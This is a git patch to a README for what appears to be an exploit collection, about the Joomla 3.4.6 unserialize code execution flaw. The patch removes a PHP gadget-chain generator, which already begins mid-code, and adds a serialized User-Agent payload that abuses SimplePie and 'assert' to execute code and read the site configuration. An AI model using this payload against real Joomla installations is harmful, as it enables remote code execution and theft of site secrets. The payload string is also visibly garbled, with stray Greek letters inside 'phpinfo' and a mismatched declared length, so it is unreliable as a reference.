From 73fc2535ce2f2798b1b82a9e6ca1db645c4d64d0 Mon Sep 17 00:00:00 2001
From: Mr5m1th <32160540+Mr5m1th@users.noreply.github.com>
Date: Sat, 25 Nov 2017 16:12:53 +0800
Subject: [PATCH] Update README.md
---
 CMS/Joomla/Joomla_v3.4.6/README.md | 47 ++----------------------------
 1 file changed, 3 insertions(+), 44 deletions(-)
diff --git a/CMS/Joomla/Joomla_v3.4.6/README.md b/CMS/Joomla/Joomla_v3.4.6/README.md
index 3f32ae4..88dc569 100644
--- a/CMS/Joomla/Joomla_v3.4.6/README.md
+++ b/CMS/Joomla/Joomla_v3.4.6/README.md
@@ -5,48 +5,7 @@
 * [https://www.leavesongs.com/PENETRATION/joomla-unserialize-code-execute-vulnerability.html](https://www.leavesongs.com/PENETRATION/joomla-unserialize-code-execute-vulnerability.html)
 * PHP Session 序列化及反序列化处理器设置使用不当带来的安全隐患[https://github.com/80vul/phpcodz/blob/master/research/pch-013.md](https://github.com/80vul/phpcodz/blob/master/research/pch-013.md)
 * `利用'𝌆'(%F0%9D%8C%86)字符将utf-8的字段截断.`
-## EXP
-```php
-feed_url = "phpinfo();JFactory::getConfig();exit;";
- $this->javascript = 9999;
- $this->cache_name_function = "assert";
- $this->sanitize = new JDatabaseDriverMysql();
- $this->cache = true;
- }
-}
-
-class JDatabaseDriverMysqli {
- protected $a;
- protected $disconnectHandlers;
- protected $connection;
- function __construct()
- {
- $this->a = new JSimplepieFactory();
- $x = new SimplePie();
- $this->connection = 1;
- $this->disconnectHandlers = [
- [$x, "init"],
- ];
- }
-}
-
-$a = new JDatabaseDriverMysqli();
-echo serialize($a);
-```
 ## POC
-由上述代码生成
+```
+User-Agent: 123}__test|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";s:37:"ρhιτhσπpinfo();JFactory::getConfig();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}𝌆
+```